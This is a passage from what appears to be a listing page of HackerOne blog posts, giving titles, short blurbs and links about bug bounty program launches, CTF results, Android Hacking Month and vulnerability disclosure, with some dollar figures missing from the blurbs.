https://www.hackerone.com/ethical-hacker/dropbox-bug-bounty-program-has-paid-out-over-1000000
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hyatt Celebrates its First Anniversary on HackerOne

https://www.hackerone.com/vulnerability-management/hyatt-celebrates-its-first-anniversary-hackerone
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

#AndroidHackingMonth: Introduction to Android Hacking by @0xteknogeek

https://www.hackerone.com/ethical-hacker/androidhackingmonth-intro-to-android-hacking
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Guess what's coming!? #AndroidHackingMonth on @Hacker0x01
February is Android Hacking Month! That means new resources, new CTFs, and, of course, swag. Learn more about how to get involved.
https://www.hackerone.com/ethical-hacker/AndroidHackingMonth
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

h1-415 CTF Winners Announced!
Thanks to all who participated in our #h1415 CTF, and congratulations to our winners @p4fg and @manoelt! Here's how it went down.
https://www.hackerone.com/ethical-hacker/h1-415-ctf-winners-announced
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

InnoGames Models Avatar After Top Ethical Hacker
Kevin Heseler, Security Engineer at InnoGames, tells us about how InnoGames leverages their bug bounty program to secure their games and the unique approach they have taken to awarding their most valuable hacker with their very own avatar in the ‘Forge of Empires' game
https://www.hackerone.com/ethical-hacker/innogames-models-avatar-after-top-ethical-hacker
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why Every Federal Agency Needs a VDP

https://www.hackerone.com/vulnerability-management/why-every-federal-agency-needs-vdp
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GitLab Celebrates Awarding Million in Bounties to Hackers on HackerOne
Today, GitLab announced that they have awarded million in bounties to hackers on HackerOne. To learn more about the open-source tool's security strategy and commitment to transparency, we sat down with security managers James Ritchey and Ethan Strike. Read on for a glimpse into our conversation.
https://www.hackerone.com/vulnerability-management/gitlab-celebrates-awarding-1-million-bounties-hackers-hackerone
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne Launches Bug Bounty Program for Kubernetes
The Cloud Native Computing Foundation (CNCF) today launched the Kubernetes bug bounty program on HackerOne. The Kubernetes bug bounty program is yet another layer of security assurance that will reward researchers who find vulnerabilities in the container orchestration system. Bounties will range from 0 to ,000. All reports will be thoroughly investigated by the Kubernetes Product Security Committee, a set of security-minded Kubernetes community volunteers.
https://www.hackerone.com/application-security/hackerone-launches-bug-bounty-program-kubernetes
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hacking for Good

https://www.hackerone.com/ceo/hacking-good
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

This Season, Give the Gift of Data-Driven Insight

https://www.hackerone.com/company-news/season-give-gift-data-driven-insight
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Using Bug Bounty Talent Pools to Attract and Maintain Top Talent

https://www.hackerone.com/vulnerability-management/using-bug-bounty-talent-pools-attract-and-maintain-top-talent
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Transparency Builds Trust
Someone called it a “breach,” and the world took notice. Here is the story.
https://www.hackerone.com/vulnerability-management/transparency-builds-trust
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Bug Bounties Help You Shift Left

https://www.hackerone.com/application-security/how-bug-bounties-help-you-shift-left
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne is a 2019 Cyber Catalyst Designated Cybersecurity Solution

https://www.hackerone.com/application-security/hackerone-2019-cyber-catalyst-designated-cybersecurity-solution
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

8 High-impact Bugs and How HackerOne Customers Avoided a Breach: SQL Injection

https://www.hackerone.com/security-compliance/8-high-impact-bugs-and-how-hackerone-customers-avoided-breach-sql-injection
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How the Risk-Averse DoD Learned to Stop Worrying and Love the Hackers

https://www.hackerone.com/vulnerability-management/how-risk-averse-dod-learned-stop-worrying-and-love-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The World's Elite Hackers Share Tips and Insights

https://www.hackerone.com/ethical-hacker/worlds-elite-hackers-share-tips-and-insights
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

LINE Launches Public Bug Bounty Program: Q&A with Security Engineer Robin Lunde
Today, after three successful years running an independent bug bounty program, LINE launched a public bug bounty program on HackerOne. To learn more about the popular messaging app's security strategy and commitment to the hacker community, we sat down with security engineers Robin Lunde, Koh You Liang and Keitaro Yamazaki. Read on for a glimpse into our conversation.
https://www.hackerone.com/application-security/line-launches-public-bug-bounty-program-qa-security-engineer-robin-lunde
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Supporting the Source: Why HackerOne is Upgrading its Free Tools for Open Source
Open source software powers HackerOne. As part of our mission to make the internet safer, we want to make it easier for your open source project to remain secure, so we're joining GitHub Security Lab. Read on for more on why we're joining, new free offerings for open source projects from HackerOne, and new open source targets for hackers from GitHub and HackerOne.
https://www.hackerone.com/vulnerability-management/supporting-source-why-hackerone-upgrading-its-free-tools-open-source
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Announcing Program Audit Log
As our customers' security teams grow, it's important for us to sustain their growth with new features. Today we're announcing the Program Audit Log. It enables customers to audit important actions that were taken in their program, such as permission updates, new members, bounty rewards, and program settings. Read on for more!
https://www.hackerone.com/vulnerability-management/announcing-program-audit-log
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Reducing Risk With a Bug Bounty Program

https://www.hackerone.com/application-security/reducing-risk-bug-bounty-program
Partager : LinkedIn /